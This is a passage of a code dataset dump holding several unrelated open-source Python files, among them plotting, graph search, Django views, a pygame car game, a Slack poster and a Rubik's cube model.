**style)\n\ndef main():\n parser = argparse.ArgumentParser(description='Plot.')\n parser.add_argument('infile', action='store')\n parser.add_argument('outfile', action='store')\n parser.add_argument('--time-series', action='store_true', default=False)\n parser.add_argument('--eigenvalues', action='store_true', default=False)\n parser.add_argument('--ticks', action='store', default=None)\n parser.add_argument('--nrows', action='store', type=int, default=1)\n parser.add_argument('--title', action='store', default='')\n args = parser.parse_args()\n\n if args.ticks is not None:\n args.ticks = [x\n for xs in read_csv(args.ticks, has_header=False)[1]\n for x in xs]\n args.ticks = [round(x, 1) for x in args.ticks]\n # print('Using ticks override: {}'.format(args.ticks))\n\n if args.time_series:\n plot_time_series(\n csv_filename=args.infile,\n out_filename=args.outfile,\n nrows=args.nrows,\n ticks=args.ticks,\n title=args.title)\n\n if args.eigenvalues:\n plot_time_series(\n csv_filename=args.infile,\n out_filename=args.outfile,\n nrows=1,\n case='eigenvalues',\n ticks=args.ticks,\n title=r'Energy eigenvalues')\n\nmain()\n","repo_name":"YodaEmbedding/experiments","sub_path":"fortran/phys395_hw5/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"24881268882","text":"from collections import deque\n\n# Definition who is seller from persons\ndef person_is_seller(name):\n return name[-1] == 'm'\n\n# Implementation breadth-first search algorithm\ndef breadth_search(name):\n search_queue = deque()\n search_queue += graph[\"You\"]\n searched = []\n while search_queue:\n person = search_queue.popleft()\n if not person in searched:\n if person_is_seller(person):\n print(person + \" is a mango seller!\")\n return True\n else:\n search_queue += graph[person]\n searched.append(person)\n return False\n\n# Define friends graph\ngraph = {}\ngraph[\"You\"] = [\"Alice\", \"Bob\", \"Claire\"]\ngraph[\"Bob\"] = [\"Anuj\", \"Peggy\"]\ngraph[\"Alice\"] = [\"Peggy\"]\ngraph[\"Claire\"] = [\"Thom\", \"Jonny\"]\ngraph[\"Anuj\"] = []\ngraph[\"Peggy\"] = []\ngraph[\"Thom\"] = []\ngraph[\"Jonny\"] = []\n\nif (not breadth_search(\"You\")):\n print(\"Mango sellers not found\")\n","repo_name":"grawitti/py_samples","sub_path":"grokking_algo/breadth_first_search.py","file_name":"breadth_first_search.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"11308723246","text":"import unittest\nfrom copy import deepcopy\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\n\nclass BaseWebRichObjectTestCase(unittest.TestCase):\n url = 'http://example.com'\n\n def _get_mock_attrs(self):\n func = getattr(self, self._testMethodName)\n return getattr(func, 'mock_attrs', None)\n\n def setUp(self):\n mock_attrs = self._get_mock_attrs()\n if mock_attrs is not None:\n self.patch = patch('web_rich_object.api.urlopen', **mock_attrs)\n self.patch.start()\n\n def tearDown(self):\n if self._get_mock_attrs() is not None:\n self.patch.stop()\n\nHTML_RESPONSE_INFO = {\n 'dict': {\n 'accept-ranges': 'bytes',\n 'cache-control': 'max-age=900',\n 'connection': 'close',\n 'content-length': '59593',\n 'content-type': 'text/html; charset=UTF-8',\n 'date': 'Sat, 17 Dec 2016 20:52:48 GMT',\n 'expires': 'Sat, 17 Dec 2016 21:06:53 GMT',\n 'server': 'Apache',\n 'x-adobe-content': 'AEM',\n 'x-ua-compatible': 'IE=11'\n },\n 'encodingheader': None,\n 'fp': None,\n 'headers': [\n 'Server: Apache\\r\\n',\n 'X-UA-Compatible: IE=11\\r\\n',\n 'X-Adobe-Content: AEM\\r\\n',\n 'Accept-Ranges: bytes\\r\\n',\n 'Cache-Control: max-age=900\\r\\n',\n 'Expires: Sat, 17 Dec 2016 21:06:53 GMT\\r\\n',\n 'Content-Type: text/html; charset=UTF-8\\r\\n',\n 'Date: Sat, 17 Dec 2016 20:52:48 GMT\\r\\n',\n 'Content-Length: 59593\\r\\n',\n 'Content-Language: PT\\r\\n',\n 'Connection: close\\r\\n'\n ],\n 'maintype': 'text',\n 'plist': ['charset=UTF-8'],\n 'plisttext': '; charset=UTF-8',\n 'seekable': 0,\n 'startofbody': None,\n 'startofheaders': None,\n 'status': '',\n 'subtype': 'html',\n 'type': 'text/html',\n 'typeheader': 'text/html; charset=UTF-8',\n 'unixfrom': ''\n}\n\nPDF_RESPONSE_INFO = deepcopy(HTML_RESPONSE_INFO)\nPDF_RESPONSE_INFO['maintype'] = 'application'\nPDF_RESPONSE_INFO['type'] = 'application'\nPDF_RESPONSE_INFO['subtype'] = 'pdf'\n\nIMAGE_RESPONSE_INFO = {\n 'dict': {\n 'cache-control': 'public, max-age=315360000',\n 'cf-cache-status': 'MISS',\n 'cf-ray': '312f513938bc6224-LIS',\n 'connection': 'close',\n 'content-length': '12141',\n 'content-type': 'image/png',\n 'date': 'Sun, 18 Dec 2016 02:52:11 GMT',\n 'etag': '\"63045090f550f37601888be65832f3e6\"',\n 'expires': 'Wed, 16 Dec 2026 02:52:11 GMT',\n 'last-modified': 'Tue, 18 Aug 2015 14:43:38 GMT',\n 'server': 'cloudflare-nginx',\n 'set-cookie': '__cfduid=dd3b9155f31aac201599f9a237f5457e41482029531; expires=Mon, 18-Dec-17 02:52:11 GMT; path=/; domain=.imgur.com; HttpOnly',\n 'vary': 'Accept-Encoding',\n 'x-amz-storage-class': 'REDUCED_REDUNDANCY',\n 'x-amz-version-id': '4fxFOV0qAhyGrAviTh37dKrZfC5qu2hL'\n },\n 'encodingheader': None,\n 'fp': None,\n 'headers': [\n 'Date: Sun, 18 Dec 2016 02:52:11 GMT\\r\\n',\n 'Content-Type: image/png\\r\\n',\n 'Content-Length: 12141\\r\\n',\n 'Connection: close\\r\\n',\n 'Set-Cookie: __cfduid=dd3b9155f31aac201599f9a237f5457e41482029531; expires=Mon, 18-Dec-17 02:52:11 GMT; path=/; domain=.imgur.com; HttpOnly\\r\\n',\n 'Cache-Control: public, max-age=315360000\\r\\n',\n 'ETag: \"63045090f550f37601888be65832f3e6\"\\r\\n',\n 'Expires: Wed, 16 Dec 2026 02:52:11 GMT\\r\\n',\n 'Last-Modified: Tue, 18 Aug 2015 14:43:38 GMT\\r\\n',\n 'x-amz-storage-class: REDUCED_REDUNDANCY\\r\\n',\n 'x-amz-version-id: 4fxFOV0qAhyGrAviTh37dKrZfC5qu2hL\\r\\n',\n 'CF-Cache-Status: MISS\\r\\n',\n 'Vary: Accept-Encoding\\r\\n',\n 'Server: cloudflare-nginx\\r\\n',\n 'CF-RAY: 312f513938bc6224-LIS\\r\\n'\n ],\n 'maintype': 'image',\n 'plist': [],\n 'plisttext': '',\n 'seekable': 0,\n 'startofbody': None,\n 'startofheaders': None,\n 'status': '',\n 'subtype': 'png',\n 'type': 'image/png',\n 'typeheader': 'image/png',\n 'unixfrom': ''\n}\n\nUNKNOW_RESPONSE_INFO = deepcopy(HTML_RESPONSE_INFO)\ndel PDF_RESPONSE_INFO['headers'][UNKNOW_RESPONSE_INFO['headers'].index('Content-Language: PT\\r\\n')]\n","repo_name":"ZuluPro/web-rich-object","sub_path":"web_rich_object/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"73353952115","text":"from valetapp.models.Booking.booking import Booking\nfrom valetapp.models.Users.customer import Customer\nfrom valetapp.models.Store.chainstore import ChainStore\nfrom valetapp.models.Valet.valet import Valet\nfrom valetapp.models.Users.membershiptype import MembershipType\nfrom valetapp.models.Users.staff import Staff\nfrom valetapp.views.Visitor.concreteVisitor import ConcreteVisitor\nfrom django.shortcuts import render\n\n\ndef getVisitor(request):\n bookings = Booking.objects.all()\n customers = Customer.objects.all()\n stores = ChainStore.objects.all()\n valets = Valet.objects.all()\n membershipTypes = MembershipType.objects.all()\n staffs = Staff.objects.all()\n visitor = ConcreteVisitor()\n\n total_sum = 0\n customer_emails_for_promotions = []\n store_names = []\n valet_types = []\n membership_types = []\n staff_members = []\n\n for booking in bookings:\n total_sum += booking.accept(visitor)\n for customer in customers:\n customer_emails_for_promotions.append(customer.accept(visitor))\n for store in stores:\n store_names.append(store.accept(visitor))\n for valet in valets:\n valet_types.append(valet.accept(visitor))\n for membershipType in membershipTypes:\n membership_types.append(membershipType.accept(visitor))\n for staff in staffs:\n staff_members.append(staff.accept(visitor))\n\n money_made_by_each_store = get_money_made_by_each_store(bookings, stores)\n\n export_to_CSV_object = {\n 'total_sum': total_sum,\n 'customers': customer_emails_for_promotions,\n 'store_names': store_names,\n 'valet_types': valet_types,\n 'membership_types': membership_types,\n 'staff_members': staff_members,\n 'money_made_by_each_store': money_made_by_each_store\n }\n\n return render(request, \"Booking/booking_list.html\", {'export_data': export_to_CSV_object})\n\n\ndef get_money_made_by_each_store(bookings, stores):\n money_made_by_store = []\n for store in stores:\n store_total = 0\n for booking in bookings:\n if(booking.get_store() == store):\n store_total += booking.get_price()\n money_made_by_store.append((store.get_name(), store_total))\n return money_made_by_store\n","repo_name":"dylank09/ValetSystem","sub_path":"valetproject/valetapp/views/Visitor/exportToCSV.py","file_name":"exportToCSV.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"70301885233","text":"from django.shortcuts import render, render_to_response, redirect\nfrom HandBook.models import Class, Group, SubGroup, Company, HandBook\nfrom Elements.models import Element\nfrom Profile.models import Profile\nimport json\nfrom django.http.response import HttpResponse\nfrom django.template.context_processors import csrf\nimport pandas as pd\nfrom HandBook.export_Excel import export_df_to_excel\nfrom HandBook.export_PDF import export_df_to_pdf\nimport os\n\n# ----------------------------------- FUNCTIONS FOR CREATED HANDBOOK -------------------------\n\n\ndef remove_files(request):\n # filepath = 'QualificationWork/static/ExportFiles/'\n filepath = 'static/ExportFiles/'\n excel_file = filepath + request.user.username + '_excel_file.xlsx'\n pdf_file = filepath + request.user.username + '_pdf_file.pdf'\n os.remove(excel_file)\n os.remove(pdf_file)\n return HttpResponse('200')\n\n\ndef element_parameters(element, fields):\n fields_list = []\n for field in fields:\n parameter = element.__getattribute__(field)\n if not hasattr(parameter, 'name'):\n fields_list.append(parameter)\n else:\n fields_list.append(parameter.name)\n return fields_list\n\n\ndef create_dataframe(required_elements, elements_indexes=False):\n if elements_indexes:\n elements_ids = []\n fields = [field.name for field in Element._meta.get_fields()]\n df = pd.DataFrame(columns=fields)\n for index_element, element in enumerate(required_elements):\n df.loc[index_element] = element_parameters(element, fields)\n elements_ids.append(element.id)\n df.drop(['id'], axis=1, inplace=True)\n return df, elements_ids\n else:\n fields = [field.name for field in Element._meta.get_fields()]\n df = pd.DataFrame(columns=fields)\n for index_element, element in enumerate(required_elements):\n df.loc[index_element] = element_parameters(element, fields)\n df.drop(['id'], axis=1, inplace=True)\n return df\n\n\ndef create_handbook(request):\n args = {}\n args.update(csrf(request))\n args.update({\"username\": request.user.username})\n # file_path = 'QualificationWork/static/ExportFiles/'\n file_path = 'static/ExportFiles/'\n links = {\"pdf\": file_path + str(request.user.username) + '_pdf_file',\n \"excel\": file_path + str(request.user.username) + '_excel_file'}\n if request.POST:\n required_elements = [element for element in Element.objects.all() if request.POST.get(\"3_\" + str(element.id)) is not None]\n if len(required_elements) != 0:\n df, elements_ids = create_dataframe(required_elements, True)\n request.user.profile.set_coins(request.POST.get(\"coins\"))\n request.user.profile.save()\n handbook = HandBook(user=request.user,\n handbook_name=request.POST.get(\"handbook_name\"))\n handbook.set_elements(elements_ids)\n handbook.save()\n export_df_to_pdf(df, filename=links.get(\"pdf\"))\n export_df_to_excel(df, filename=links.get(\"excel\"))\n args.update({\"elements\": df.values.tolist()})\n args.update({\"columns\": df.columns})\n args.update({\"links\": links})\n return render_to_response(\"createdHandbookExtension.html\", args)\n else:\n return render_to_response(\"createdHandbookExtension.html\", args)\n else:\n elements_ids = HandBook.objects.get(id=request.GET['handbook']).get_elements_ids()\n elements = Element.objects.filter(pk__in=elements_ids)\n df = create_dataframe(elements)\n export_df_to_pdf(df, filename=links.get(\"pdf\"))\n export_df_to_excel(df, filename=links.get(\"excel\"))\n args.update({\"elements\": df.values.tolist()})\n df_columns_names = ['Название', 'Компания', 'Класс', 'Группа', 'Подгруппа', 'Средняя наработка на отказ',\n 'Средний срок сохраняемости', 'Средний ресурс (ч)', 'Среднее время восстановления (ч)',\n 'Дополнительная Информация', 'Дата добавления', 'Подтверждающая ссылка']\n args.update({\"columns\": df_columns_names})\n args.update({\"links\": links})\n return render_to_response(\"createdHandbookExtension.html\", args)\n\n\ndef delete_handbook(request):\n handbook_id = request.GET[\"id\"]\n handbook = HandBook.objects.get(id=handbook_id)\n handbook.delete()\n return redirect(\"/personal_account\")\n\n# ----------------------------------- FUNCTIONS FOR CREATING HANDBOOK -------------------------\n\n\ndef create_unique_id(object):\n models = [Class, Group, SubGroup, Element]\n for index, model in enumerate(models):\n if isinstance(object, model):\n return str(index) + \"_\" + str(object.id)\n\n\ndef choose_elements(request):\n args = {}\n args.update(csrf(request))\n classes = [{\"id\": create_unique_id(_class), \"name\": _class.name} for _class in Class.objects.all()]\n args.update({\"classes\": classes})\n args.update({\"username\": request.user.username})\n args.update({\"user\": request.user})\n return render_to_response(\"handbookCreatingExtension.html\", args)\n\n\ndef get_data_for_removing(id, model):\n if model is Class:\n groups = [object for object in Group.objects.filter(class_id=Class.objects.get(id=id))]\n subgroups = sum([[object for object in SubGroup.objects.filter(group_id=group)] for group in groups], [])\n elements = sum([[object for object in Element.objects.filter(Subgroup_id=subgroup)] for subgroup in subgroups], [])\n return [create_unique_id(object) for object in (groups + subgroups + elements)]\n if model is Group:\n subgroups = [object for object in SubGroup.objects.filter(group_id=Group.objects.get(id=id))]\n elements = sum([[object for object in Element.objects.filter(Subgroup_id=subgroup)] for subgroup in subgroups], [])\n return [create_unique_id(object) for object in (subgroups + elements)]\n if model is SubGroup:\n return [create_unique_id(object) for object in Element.objects.filter(Subgroup_id=SubGroup.objects.get(id=id))]\n\n\ndef collect_data(request):\n data = []\n models = [Class, Group, SubGroup, Element]\n model_id, object_id = str(request.GET[\"id\"]).split(\"_\")\n model = models[int(model_id)]\n event = int(request.GET[\"event\"])\n if event == 0:\n if model is Class:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in Group.objects.filter(class_id=Class.objects.get(id=object_id))]\n if model is Group:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in SubGroup.objects.filter(group_id=Group.objects.get(id=object_id))]\n if model is SubGroup:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in Element.objects.filter(Subgroup=SubGroup.objects.get(id=object_id))]\n else:\n data = get_data_for_removing(object_id, model)\n return HttpResponse(json.dumps(data))\n","repo_name":"Belket/QualificationWork","sub_path":"HandBook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28114062398","text":"# Kirjoita ohjelma, joka kysyy käyttäjältä viiden kaupungin nimet yksi kerrallaan (käytä for-toistorakennetta nimien kysymiseen) ja tallentaa ne listarakenteeseen. \n# Lopuksi ohjelma tulostaa kaupunkien nimet yksi kerrallaan allekkain samassa järjestyksessä kuin ne syötettiin. \n# käytä for-toistorakennetta nimien kysymiseen ja for/in toistorakennetta niiden läpikäymiseen.\n\ncities = []\n\nfor i in range(5):\n city = input(\"Kirjoita kaupungin nimi: \")\n cities.append(city)\n\nfor city in cities:\n print(city)","repo_name":"kassu11/AMK-python","sub_path":"module05-homework/5.4-kaupunkien-kysely.py","file_name":"5.4-kaupunkien-kysely.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"33638020436","text":"import json\nimport slack # module is called slackclient\n\n# Local image taken from https://ccsearch.creativecommons.org/photos/a376def5-1f22-4e28-b2f0-8cf67398afa8\n\n# Load global config\nwith open(\"../network_config/slack.json\") as slack_f:\n slack_settings = json.load(slack_f)\n\nOATH = slack_settings[\"OAUTH_TOKEN\"]\nWEBHOOK_URL = slack_settings[\"WEBHOOK\"]\nUSEWEBHOOK = slack_settings[\"USE_WEBHOOK\"] # set 1 in ../network_config/slack.json if you can't use OATH (no graph though)\nSLACKCHANNEL = slack_settings[\"CHANNEL\"]\n\nwith open(\"blocks.json\", \"rt\") as block_f:\n data = json.load(block_f)\n\nclient = slack.WebClient(token=OATH)\n\nclient.files_upload(\n channels=SLACKCHANNEL,\n file=\"slacks.jpg\",\n title=\"Local File\"\n)\nclient.chat_postMessage(\n channel=SLACKCHANNEL,\n blocks=data\n)\n","repo_name":"FrancisCrickInstitute/network_modules","sub_path":"_slack_post.py","file_name":"_slack_post.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"21640744176","text":"import pygame\nimport math\nfrom pygame.locals import *\nfrom pygame.math import *\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 800\nWHITE = [255, 255, 255]\n\ndef rot_center(image, rect, angle):\n \"\"\"rotate an image while keeping its center\"\"\"\n rot_image = pygame.transform.rotate(image, angle)\n rot_rect = rot_image.get_rect(center=rect.center)\n return rot_image,rot_rect\n\nclass Car(pygame.sprite.Sprite):\n \n def __init__(self, color):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('car_'+color+'.png').convert_alpha()\n self.image = pygame.transform.scale(self.image, (int(SCREEN_WIDTH/20), int(SCREEN_HEIGHT/20)))\n self.image = pygame.transform.rotate(self.image, 90)\n self.original_image = self.image \n \n self.mask = pygame.mask.from_surface(self.image)\n \n self.rect = self.image.get_rect()\n self.rect[0] = 50 \n self.rect[1] = 100 \n \n self.position = Vector2((self.rect[0], self.rect[1]))\n self.direction = Vector2(1, 0)\n \n self.speed = 0\n self.angle_speed = 0\n self.angle = 0\n #self.image, self.rect = rot_center(self.image, self.rect, 90)\n \n def update(self):\n if(self.angle_speed != 0):\n self.direction.rotate_ip(self.angle_speed)\n self.angle += self.angle_speed\n self.image = pygame.transform.rotate(self.original_image, -self.angle)\n self.rect = self.image.get_rect(center = self.rect.center)\n self.position += self.direction * self.speed\n self.rect.center = self.position\n \n #print(pygame.Surface.get_at((self.rect[0], self.rect[1])))\nclass Background(pygame.sprite.Sprite):\n \n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('pista.png')\n self.image = pygame.transform.scale(self.image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n #self.mask = pygame.mask.from_threshold(self.image, pygame.Color('black'))\n self.mask = pygame.mask.from_surface(self.image)\n self.rect = self.image.get_rect()\ndef clear_callback(surf, rect):\n color = 255, 255, 255\n surf.fill(color, rect)\n\n\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nscreen.fill(WHITE)\n\nbackground_group = pygame.sprite.Group()\nBACKGROUND = Background()\nbackground_group.add(BACKGROUND)\n\ncar_group = pygame.sprite.Group()\ncar = Car('red')\ncar_group.add(car)\n\n\n\nclock = pygame.time.Clock()\nwhile True:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n car.speed += 1\n elif event.key == pygame.K_DOWN:\n car.speed -= 1\n elif event.key == pygame.K_LEFT:\n car.angle_speed = -3\n elif event.key == pygame.K_RIGHT:\n car.angle_speed = 3\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n car.angle_speed = 0\n elif event.key == pygame.K_RIGHT:\n car.angle_speed = 0\n clear_callback(screen, car.rect)\n screen.blit(BACKGROUND.image, (0, 0))\n car_group.update()\n car_group.draw(screen)\n\n\n \n pygame.display.update()\n \n\n if(pygame.sprite.groupcollide(car_group, background_group, False, False, pygame.sprite.collide_mask)):\n print(\"GAME OVER\")\n break\n\npygame.quit()\n","repo_name":"Iwazo8700/race_ia","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"10246170641","text":"# -*- coding:utf-8 -*-\n\n\nfrom collections import deque\nfrom graph import Undigraph\n\n\ndef print_vertex_trace(prev, s, t, level=1):\n if prev[t] != -1 and t != s:\n print_vertex_trace(prev, s, prev[t], level+1)\n if level == 1:\n print(\"%d\" % t)\n else:\n print(\"%d -> \" % t, end=\"\")\n\n\ndef bfs(graph, s, t):\n if s == t:\n return \n queue = deque()\n prev = [ -1 ] * len(graph)\n visited = [False] * len(graph)\n visited[s] = True\n queue.append(s)\n while len(queue) > 0:\n vertex = queue.popleft()\n for adj_v in graph[vertex]:\n if not visited[adj_v]:\n prev[adj_v] = vertex\n if adj_v == t:\n return prev\n visited[adj_v] = True\n queue.append(adj_v)\n return prev\n\n\ndef recursive_dfs(graph, s, t):\n prev = [-1] * len(graph)\n visited = [False] * len(graph)\n found = False\n def rdfs(s, t):\n nonlocal found\n if s == t:\n found = True\n return \n for v in graph[s][::-1]:\n if not visited[v]:\n visited[v] = True\n prev[v] = s\n rdfs(v, t)\n rdfs(s, t)\n return prev\n\n\ndef dfs(graph, s, t):\n prev = [-1] * len(graph)\n visited = [False] * len(graph)\n stk = [s]\n visited[s] = True\n while len(stk) > 0:\n vertex = stk.pop()\n for v in graph[vertex]:\n if not visited[v]:\n prev[v] = vertex\n if t == v:\n return prev\n visited[v] = True\n stk.append(v)\n \n\nif __name__ == '__main__':\n g = Undigraph(8)\n g.add_edge(0, 1)\n g.add_edge(0, 3)\n g.add_edge(1, 2)\n g.add_edge(1, 4)\n g.add_edge(2, 5)\n g.add_edge(3, 4)\n g.add_edge(4, 5)\n g.add_edge(4, 6)\n g.add_edge(5, 7)\n g.add_edge(6, 7)\n print(g)\n bfs_prev = bfs(g, 0, 7)\n print_vertex_trace(bfs_prev, 0, 7)\n dfs_prev = recursive_dfs(g, 0, 7)\n print_vertex_trace(dfs_prev, 0, 7) \n dfs2_prev = dfs(g, 0, 7)\n print_vertex_trace(dfs2_prev, 0, 7) \n","repo_name":"free-free/algorithm","sub_path":"graph/graph_search.py","file_name":"graph_search.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"}
+{"seq_id":"70266341873","text":"from typing import Union, Optional\n\nimport magic\n\nfrom d20.Manual.BattleMap import FileObject\nfrom d20.Manual.Templates import (NPCTemplate,\n registerNPC)\nfrom d20.Manual.Facts import (MimeTypeFact, # type: ignore\n Fact)\n\n\n# Process basic information to initially populate fact table\n@registerNPC(\n name=\"MimeTypeNPC\",\n description=(\"This NPC provides the mimetype of an object.\"),\n creator=\"Mike Goffin\",\n version=\"0.1\",\n engine_version=\"0.1\"\n)\nclass MimeTypeNPC(NPCTemplate):\n def __init__(self, **kwargs: str) -> None:\n super().__init__(**kwargs)\n\n def handleData(self, **kwargs: FileObject) -> None:\n if 'data' not in kwargs:\n raise RuntimeError(\"Expected 'data' in arguments\")\n\n dataObj: FileObject = kwargs['data']\n data: Union[bytes, bytearray, memoryview] = dataObj.data\n try:\n mimetype: Optional[str] = magic.from_buffer(data, mime=True)\n except Exception:\n mimetype = None\n if mimetype:\n mimetype = mimetype.split(';')[0]\n else:\n mimetype = None\n try:\n filetype: Optional[str] = magic.from_buffer(data)\n except Exception:\n filetype = 'Unknown'\n mimetypeFact: Fact = MimeTypeFact(\n mimetype=mimetype,\n filetype=filetype,\n parentObjects=[dataObj.id]\n )\n self.console.addFact(mimetypeFact)\n","repo_name":"MITRECND/d20","sub_path":"d20/NPCS/MimeTypeNPC.py","file_name":"MimeTypeNPC.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"}
+{"seq_id":"23764795140","text":"import random\nimport sys\nimport time\nimport sys\n\nMOVES = {\n \"U\": [2, 0, 3, 1, 20, 21, 6, 7, 4, 5, 10, 11, 12, 13, 14, 15, 8, 9, 18, 19, 16, 17, 22, 23],\n \"U'\": [1, 3, 0, 2, 8, 9, 6, 7, 16, 17, 10, 11, 12, 13, 14, 15, 20, 21, 18, 19, 4, 5, 22, 23],\n \"R\": [0, 9, 2, 11, 6, 4, 7, 5, 8, 13, 10, 15, 12, 22, 14, 20, 16, 17, 18, 19, 3, 21, 1, 23],\n \"R'\": [0, 22, 2, 20, 5, 7, 4, 6, 8, 1, 10, 3, 12, 9, 14, 11, 16, 17, 18, 19, 15, 21, 13, 23],\n \"F\": [0, 1, 19, 17, 2, 5, 3, 7, 10, 8, 11, 9, 6, 4, 14, 15, 16, 12, 18, 13, 20, 21, 22, 23],\n \"F'\": [0, 1, 4, 6, 13, 5, 12, 7, 9, 11, 8, 10, 17, 19, 14, 15, 16, 3, 18, 2, 20, 21, 22, 23],\n \"D\": [0, 1, 2, 3, 4, 5, 10, 11, 8, 9, 18, 19, 14, 12, 15, 13, 16, 17, 22, 23, 20, 21, 6, 7],\n \"D'\": [0, 1, 2, 3, 4, 5, 22, 23, 8, 9, 6, 7, 13, 15, 12, 14, 16, 17, 10, 11, 20, 21, 18, 19],\n \"L\": [23, 1, 21, 3, 4, 5, 6, 7, 0, 9, 2, 11, 8, 13, 10, 15, 18, 16, 19, 17, 20, 14, 22, 12],\n \"L'\": [8, 1, 10, 3, 4, 5, 6, 7, 12, 9, 14, 11, 23, 13, 21, 15, 17, 19, 16, 18, 20, 2, 22, 0],\n \"B\": [5, 7, 2, 3, 4, 15, 6, 14, 8, 9, 10, 11, 12, 13, 16, 18, 1, 17, 0, 19, 22, 20, 23, 21],\n \"B'\": [18, 16, 2, 3, 4, 0, 6, 1, 8, 9, 10, 11, 12, 13, 7, 5, 14, 17, 15, 19, 21, 23, 20, 22],\n}\n\nclass Cube:\n\n def __init__(self, string=\"WWWW RRRR GGGG YYYY OOOO BBBB\"):\n self.stateString = string.replace(\" \", \"\")\n self.solvedStateString=\"WWWWRRRRGGGGYYYYOOOOBBBB\"\n self.solvedState=[i for i in self.solvedStateString]\n self.moves=[ \"U\", \"U'\", \"R\" , \"R'\", \"F\" , \"F'\", \"D\" , \"D'\", \"L\" , \"L'\", \"B\" , \"B'\"]\n self.currState = [i for i in self.stateString]\n self.fixedPair={0:\"U D'\",1:\"R L'\",2:\"D U'\",3:\"F B'\",4:\"L R'\",5:\"B F'\"}\n\n def createStateList(self,state):\n return [[char for char in state[i:i+4]] for i in range(0, len(''.join(state)), 4)]\n\n def norm(self,fixedPoint):\n self.applyMovesStr(self.fixedPair[fixedPoint])\n\n def normalize(self):\n for j in range(4):\n for k in range(4):\n self.norm(0)\n if [self.stateString[10],self.stateString[12],self.stateString[19]] == [\"G\",\"Y\",\"O\"]:\n return True\n self.norm(3)\n self.norm(1)\n for j in range(2):\n for k in range(4):\n self.norm(0)\n if [self.stateString[10],self.stateString[12],self.stateString[19]] == [\"G\",\"Y\",\"O\"]:\n return True\n self.norm(1)\n self.norm(1)\n return False\n\n def equals(self, cube=None):\n if cube==None:\n cube = self\n checkCube:Cube = self.clone(state=self.solvedState)\n for j in range(4):\n for k in range(4):\n checkCube.norm(0)\n if cube.stateString == checkCube.stateString:\n return True\n checkCube.norm(3)\n checkCube.norm(1)\n for j in range(2):\n for k in range(4):\n checkCube.norm(0)\n if cube.stateString == checkCube.stateString:\n return True\n checkCube.norm(1)\n checkCube.norm(1)\n return False\n\n def clone(self,state=None):\n if state==None:\n state=self.currState\n \n clone = ''\n for i in range(0, len(state), 4):\n clone+=''.join(state[i:i+4]) + \" \"\n\n return Cube(clone)\n\n # apply a move to a state\n def applyMove(self, move):\n newState = []\n if move in MOVES:\n for colorIdx in MOVES[move]:\n newState.append(self.currState[colorIdx])\n\n self.currState = newState\n self.stateString = ''.join(self.currState)\n\n # apply a string sequence of moves to a state\n def applyMovesStr(self, alg:str):\n seq = alg.split()\n for i in seq:\n self.applyMove(i)\n \n\n def isSolved(self):\n if self.isSolvedQuick():\n return self.equals()\n return False\n \n def isSolvedQuick(self):\n lst = self.createStateList(self.currState)\n for i in lst:\n if len(set(i)) != 1:\n return False\n return True\n \n def shuffle(self, n):\n moveHistory = []\n for _ in range(n):\n randomNumber = random.randint(0, len(self.moves)-1)\n move = self.moves[randomNumber]\n self.applyMove(move)\n moveHistory.append(move)\n print(\"Shuffled Move Seq:\",' '.join(moveHistory))\n\n\n def printHelper(self,cubes):\n printHelperList=[]\n remainder = len(cubes)%3\n if remainder != 0:\n printHelperList.append([self.createStateList(cube) for cube in cubes[-remainder:]])\n cubes = cubes[:-remainder]\n for idx, lstIdx in enumerate(range(0,len(cubes),3)):\n addLst = [self.createStateList(cube) for cube in cubes[lstIdx:lstIdx+3]]\n printHelperList.insert(idx,addLst)\n return printHelperList \n\n def print(self,cubes = None):\n if cubes==None:\n listCubes = [[self.createStateList(self.currState)]]\n else:\n newLst = []\n listCubes = self.printHelper(cubes)\n print(end=\"\\n\")\n # print(\"-\"*13+\"-\"*14*(len(listCubes[0])-1)+\"|\")\n for idxLst, lst in enumerate(listCubes):\n length = len(lst)\n for idx in range(length):\n print(f\" {lst[idx][0][0]}{lst[idx][0][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][0][2]}{lst[idx][0][3]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][4][0]}{lst[idx][4][1]} {lst[idx][2][0]}{lst[idx][2][1]} {lst[idx][1][0]}{lst[idx][1][1]} 